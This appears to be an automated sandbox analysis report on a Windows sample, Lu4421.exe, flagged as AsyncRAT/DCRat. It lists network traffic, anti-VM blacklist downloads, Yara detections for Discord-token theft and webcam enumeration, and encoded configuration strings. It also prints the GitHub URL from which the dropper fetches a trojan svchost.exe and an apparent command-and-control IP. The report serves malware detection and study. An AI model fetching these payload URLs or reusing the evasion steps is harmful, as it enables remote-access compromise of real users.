                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.89.44.68
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /kgnfth/tumblr/raw/refs/heads/main/svchost.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.com
                        Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                        Source: global trafficDNS traffic detected: DNS query: 41.140.13.0.in-addr.arpa
                        Source: global trafficDNS traffic detected: DNS query: github.com
                        Source: svchost.exe, 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: svchost.exe, 00000001.00000002.2946578084.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: svchost.exe, 00000001.00000002.2954494192.000000001BB40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c78eb1975523c
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64314000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2947120168.00000000036B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                        Source: Lu4421.exeString found in binary or memory: https://github.com/kgnfth
                        Source: Lu4421.exeString found in binary or memory: https://github.com/kgnfth/tumblr/raw/refs/heads/main/svchost.exe
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/kgnfth/tumblr/raw/refs/heads/main/svchost.exeP
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                        Source: Lu4421.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/Machi
                        Source: Lu4421.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/g
                        Source: Lu4421.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/i
                        Source: Lu4421.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_na
                        Source: Lu4421.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_userna
                        Source: Lu4421.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes
                        Source: Lu4421.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49735 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49736 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED

                        Operating System Destruction

                        barindex
                        Protects its processes via BreakOnTermination flag
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: 01 00 00 00 Jump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: Lu4421.exe, type: SAMPLEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                        Source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                        Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                        Source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                        Source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                        Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                        Source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                        Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                        Source: 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                        Source: 00000001.00000002.2946463897.0000000001288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                        Source: 00000001.00000002.2946578084.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                        Source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                        Source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                        Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                        Source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                        Source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
                        PE file contains section with special chars
                        Source: Lu4421.exeStatic PE information: section name:
                        Source: Lu4421.exeStatic PE information: section name: .idata
                        Source: Lu4421.exeStatic PE information: section name:
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7D7418 NtProtectVirtualMemory,1_2_00007FFD9B7D7418
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7D8708 NtProtectVirtualMemory,1_2_00007FFD9B7D8708
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_011AC0A00_2_011AC0A0
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_011AF5A50_2_011AF5A5
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_00007FFD9B7FAB700_2_00007FFD9B7FAB70
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_00007FFD9B7F8B520_2_00007FFD9B7F8B52
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_00007FFD9B7F7DA60_2_00007FFD9B7F7DA6
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_00007FFD9B7FF25A0_2_00007FFD9B7FF25A
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7DDBEF1_2_00007FFD9B7DDBEF
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7D74181_2_00007FFD9B7D7418
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7D6B121_2_00007FFD9B7D6B12
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7D5D661_2_00007FFD9B7D5D66
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7D7D8D1_2_00007FFD9B7D7D8D
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7D847E1_2_00007FFD9B7D847E
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7D04B81_2_00007FFD9B7D04B8
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6768 -s 2944
                        Source: Lu4421.exe, 00000000.00000002.2043257844.0000015B62540000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamestub.exe6 vs Lu4421.exe
                        Source: Lu4421.exe, 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamestub.exe6 vs Lu4421.exe
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs Lu4421.exe
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs Lu4421.exe
                        Source: Lu4421.exe, 00000000.00000002.2043697205.0000015B643C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs Lu4421.exe
                        Source: Lu4421.exe, 00000000.00000002.2042849629.0000015B62324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Lu4421.exe
                        Source: Lu4421.exeBinary or memory string: OriginalFilenamestub.exe6 vs Lu4421.exe
                        Source: Lu4421.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                        Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                        Source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 1.0.svchost.exe.dd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                        Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                        Source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.2.Lu4421.exe.15b64564428.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                        Source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.2.Lu4421.exe.15b6457e868.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                        Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                        Source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                        Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                        Source: 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                        Source: 00000001.00000002.2946463897.0000000001288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                        Source: 00000001.00000002.2946578084.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                        Source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                        Source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                        Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                        Source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                        Source: Process Memory Space: svchost.exe PID: 480, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                        Source: svchost.exe.0.dr, Settings.csBase64 encoded string: 'SM7qHNBbEWqlNZPSlGYWkvdq+nx+ky85iVQ6KF3TfqFi7H/qad+wUbwVscOBjiGi8HLKgEIT6RGEVxRAVewGdw==', 'Q4KUFlUVHZ8A+kYrLv73HG5bB0cuH5spClpi8zNpIVRY7OujQr6NA1gnvqHHGUlh2Mj15u23AxRh+yW437nyqQ==', 'Oo5ZpBW/18EPNZ3+RAYWZfD4brLP8XhnTTvj/ogna6oN/AUj0hchRePdWSu6Ke3sO6hqT2hjgQZBOXyMvabQmw==', 'NrTdAvgbWTVfKUm4lcJWI11BTTKpyJFIq3rDEQ2KO3sthZSLtKkYESoV51GmjRrf82ZAMYm7t8o7L4zhreP4I1MgOgRLHY+vDGr1brGHXEKeQaono+64Ny4e36vnfTRJYNtDw8DCLOehIHbN0CyowyXIQjilNTtXLgPNy9EnSLzW+sW97NeDiIbnbj88sqRYG+bvheFUs7cJRxhdhztN9BCu0cvTTePSjuq49uYj29MDx/QY2Ijr2NznfCf+c2E3uV7c8kv+2N5wtSrpgAxIBQ3nhBbRlpeQP9zV6ndDJHd+T4Ps2eZa0cKH2VO4QQu1h5TffE4oL03sjyfA5daiD1WRMqb2GK2Y4NYo/6WPVahoOSTSJZPV8VxrgpSCxosIriQ27GVgdAEWGe5E+JewahIzZ2RzQSMgk5PNyQnYji5Wqz3c9O55k8biK+LfY0pfeinxdIb29b5vOjyyBOblYDUJSrPaGXMyeOvE4FywNg0Ic72pP3yxWOia3AChmYUXCWCV37oJbRRYZR2xeTIi3KQYDGMJTEp3gIVA0Qjka0C0LE/U5Yu1ADGhFDXjiql0/SNcdnQABJI7ZnHuhS/FnEXblhFO3q9E1n09Pv24gjw92Dj3BOulS4BRcfl/jup5/XkPQBcROcMc+vjdWL27aWLY7qRJZnAe43BMZhuO2zUYjr+TFkaWCcTMaZOXRK5RojZq2yO76nTsVuJdHMLGc7/DteuZejZyc8sM3S+8fbbMVXBf3wi/viNekmyxh6meFRRDTwNjIszscsYuMjQ7LywYU1rVtz636woULSCpGgHP0pe8w+ivkqIthTkbZeZDNLCpGK+fl0e4YbAYVNPYrUYd1117f61xVXmnbXJE7z0tE9DPipxdTP6gW4FJuEGWYh1lB7PkKeCYZJprCvTA7/M+PyxxdvAFd98/KCQGYM2+v6lGfiHghhgFZK33C6OUqZNMNvKqFtNAk4bEJZDFgEPzV0B8yicOywfW5wREbMkH121Wza2dGQ7GqIR/iSQNbCl29hNzMt6gkP6k4ltxBcCQA7pwFjasnXR6QdH0H7s=', 'Ww1sewE85HmNt9n7eSoa6Xcmo++JMonP7vDDbXJu+uyuIzYlTqq5HFONO5nrV8R+WFo+/cVzdNJGyvmRmGjvXUdAeMA3Vc7mRjt3zRK426/JCu41mQGVgL3IdSMAARuzIsucp9IZFPAolr8Pmp3/EsF1hdwp2sJLIaAR4XsdeHdi0Ng8VYVv3yPOl0eqOQlxPdBB0rc5/yFhmi1qES5TYRRg6D+1Vs/+aX2qVQhliiTBZerF1l4ePvJngWrhv5dASnmu/1RROX3S2wmMRUPet9HClokBDOno48++HfxnIbk=', 'YVHVzoV/Ngy7JpMYK2CUMnXKv1ISMfvG8sTCwCqopLZNi0mI0A1YFROl3IxU8Vt1N0tWSChZxaHJq8I1S843VQ==', 'LepKMSG4Rt/hsHJyNkB62nWYJbCGm8GSmSOwtZ4HTumPBLrzNTf+DXas3vWNwCzXA/fNu9pBKKs7Fp9XhI5pSw==', 